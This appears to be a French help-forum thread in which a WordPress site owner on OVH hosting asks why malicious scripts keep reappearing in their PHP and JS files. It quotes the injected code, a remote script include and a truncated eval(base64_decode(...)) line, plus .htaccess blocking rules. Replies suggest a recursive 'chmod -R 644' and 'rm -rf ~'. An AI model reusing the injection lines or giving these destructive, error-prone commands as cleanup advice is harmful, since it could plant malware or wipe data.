.htaccess modifier index.php
Joffrey
-
Joffrey -
Joffrey -
Bonjour,
Voila j'ai un gros j'ai un site chez ovh, un wordpress.. mais depuis quelque jours je suis "attaqué" non stop et google me bloque donc mon site ne me disant que j'ai des logiciels malveillant.
Aprés recherche éffectivement, j'ai a plusieurs endroit sur des pages php un bout de script qui s'ajoute.
ou encore
j'ai donc créer un .htaccess, mais je pense qu'il est mal configurer car meme aprés netoyage du site le problème reviens au bout de quelques heures...
Voici mon .htaccess
Quelqu'un pourait-il me dire comment résoudre se probleme ??
J'en peux plus... :/
Voila j'ai un gros j'ai un site chez ovh, un wordpress.. mais depuis quelque jours je suis "attaqué" non stop et google me bloque donc mon site ne me disant que j'ai des logiciels malveillant.
Aprés recherche éffectivement, j'ai a plusieurs endroit sur des pages php un bout de script qui s'ajoute.
document.write('<script src=http://pancer.eu/Fashion/index.php ><\/script>');
ou encore
<?php eval(base64_decode('aW.....dfdsdsfdsfsd=')); ?>
j'ai donc créer un .htaccess, mais je pense qu'il est mal configurer car meme aprés netoyage du site le problème reviens au bout de quelques heures...
Voici mon .htaccess
<files .htaccess>
order allow,deny
deny from all
</files>
<files wp-config.php>
order allow,deny
deny from all
</files>
Options All -Indexes
IndexIgnore *
RewriteCond %{HTTP_USER_AGENT} [0-9A-Za-z]{15,} [OR]
RewriteCond %{HTTP_USER_AGENT} ^[0-9A-Za-z]+$ [OR]
RewriteEngine on
RewriteCond %{HTTP_REFERER} digg\.com [NC]
RewriteRule .* - [F]
RewriteCond %{HTTP_USER_AGENT} ^[^?]*iaea\.org [NC,OR]
Quelqu'un pourait-il me dire comment résoudre se probleme ??
J'en peux plus... :/
A voir également:
- .htaccess modifier index.php
- Modifier dns - Guide
- Modifier liste déroulante excel - Guide
- Modifier story facebook - Guide
- Modifier extension fichier - Guide
- Modifier code pin - Guide
7 réponses
Salut,
Tu en parle à ton hébergeur, et tu supprime les lignes ! Tu dois avoir un hébergement mutualisé et le serveur doit être infecté, voit ça avec ovh ;)
Tu en parle à ton hébergeur, et tu supprime les lignes ! Tu dois avoir un hébergement mutualisé et le serveur doit être infecté, voit ça avec ovh ;)
Merci Alexis, mais j'ai contacter ovh qui me dit que le problème ne vient pas de eux, et que c'est a moi de protéger mes pages. Justement avec le htaccess.
Et ce que mon htaccess est bon ? manque t-il des choses...
Et ce que mon htaccess est bon ? manque t-il des choses...
Merci, bien j'ai fait tout ce qu'il y a dit sur le lien.. sa a marché 12h :(
Mon serveur est de nouveau contaminer... je ne comprend plus !!
Mon serveur est de nouveau contaminer... je ne comprend plus !!
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
Bonjour,
Je n'ai pas accès aux autres sites et ne connais pas exactement wordpress cependant, si ça ne vient pas d'OVH:
-Si tu as une sauvegarde de ton site sur ton pc, supprime complètement le contenu en ligne, et remet celui qui vient de ton pc (qui est sur).
-Tu as une faille sur ton site qui a permis à l'intrus d'y modifier ton code.
Pour ça, via ton accès SSH fait un
-Vérifie les alias dans le fichier ~/.bashrc
-Si tu peux toucher aux utilisateurs, créés en un nouveau (toto par exemple)
Donne lui ton site:
Vide ton home:
Change d'utilisateur et connecte toi avec le nouveau (toto donc).
Supprime ton ancien utilisateur.
Ensuite il faudrait vérifier les logs Apache, SSH, et les derniers ficihiers modifiés sur ton serveur mais... j'ai pas le man grep sous les yeux.
Je n'ai pas accès aux autres sites et ne connais pas exactement wordpress cependant, si ça ne vient pas d'OVH:
-Si tu as une sauvegarde de ton site sur ton pc, supprime complètement le contenu en ligne, et remet celui qui vient de ton pc (qui est sur).
-Tu as une faille sur ton site qui a permis à l'intrus d'y modifier ton code.
Pour ça, via ton accès SSH fait un
chmod -R 644sur le dossier parent de ton site.
-Vérifie les alias dans le fichier ~/.bashrc
cat ~/.bashrcPour être sur que tes commandes ne soient pas loguées ailleurs que dans le .bashrc
-Si tu peux toucher aux utilisateurs, créés en un nouveau (toto par exemple)
Donne lui ton site:
chown toto:toto /var/www/
Vide ton home:
rm -rf ~
Change d'utilisateur et connecte toi avec le nouveau (toto donc).
Supprime ton ancien utilisateur.
Ensuite il faudrait vérifier les logs Apache, SSH, et les derniers ficihiers modifiés sur ton serveur mais... j'ai pas le man grep sous les yeux.
L'adresse du site : http://www.warriorsdecamon.fr/
La il fonctionne, mais dans quelques heures il sera de nouveau indisponible suite à des attaques..
Tout mes fichiers sont en 604 et mes dossier en 705
Sauf pour les fichiers .htaccess et wp-config qui sont en 444
J'ai déjà mit une sauvegarde du site que j'avais mais cela à rien changé.
Pour info (si sa peux aider) le virus (ou je ne sais pas quoi) ajoute des scripts dans les fichiers index.php et quelques autres .php et aussi sur la plus par des .js
Je vous redonne mon .htaccess au cas ou :
La il fonctionne, mais dans quelques heures il sera de nouveau indisponible suite à des attaques..
Tout mes fichiers sont en 604 et mes dossier en 705
Sauf pour les fichiers .htaccess et wp-config qui sont en 444
J'ai déjà mit une sauvegarde du site que j'avais mais cela à rien changé.
Pour info (si sa peux aider) le virus (ou je ne sais pas quoi) ajoute des scripts dans les fichiers index.php et quelques autres .php et aussi sur la plus par des .js
Je vous redonne mon .htaccess au cas ou :
# Empecher de lire ou accéder au fichier .htaccess
<files .htaccess>
order allow,deny
deny from all
</files>
# Empecher de lire ou accéder au fichier wp-config.php
<Files wp-config.php>
Order Allow,Deny
Deny from All
</Files>
# Au lieu de mettre un index.html dans chaque dossier que vous ne pas rendre visible mettez cette ligne
Options All -Indexes
# Désactive la signature du serveur
ServerSignature Off
# Empêche les attaques DDOS
LimitRequestBody 10240000
# Un hôte qui tente de se cacher dans une reverse DNS lookup
RewriteCond %{REMOTE_HOST} ^private$ [NC,OR]
# Un faux referrer souvent utilisé
RewriteCond %{HTTP_USER_AGENT} ^[^?]*iaea\.org [NC,OR]
# Le referrer "addresses.com" est utilisé par un email address extractor
RewriteCond %{HTTP_USER_AGENT} ^[^?]*addresses\.com [NC,OR]
# Bloque les navigateurs se dissimulants avec des lettres et chiffres aléatoires
RewriteCond %{HTTP_USER_AGENT} [0-9A-Za-z]{15,} [OR]
RewriteCond %{HTTP_USER_AGENT} ^[0-9A-Za-z]+$ [OR]
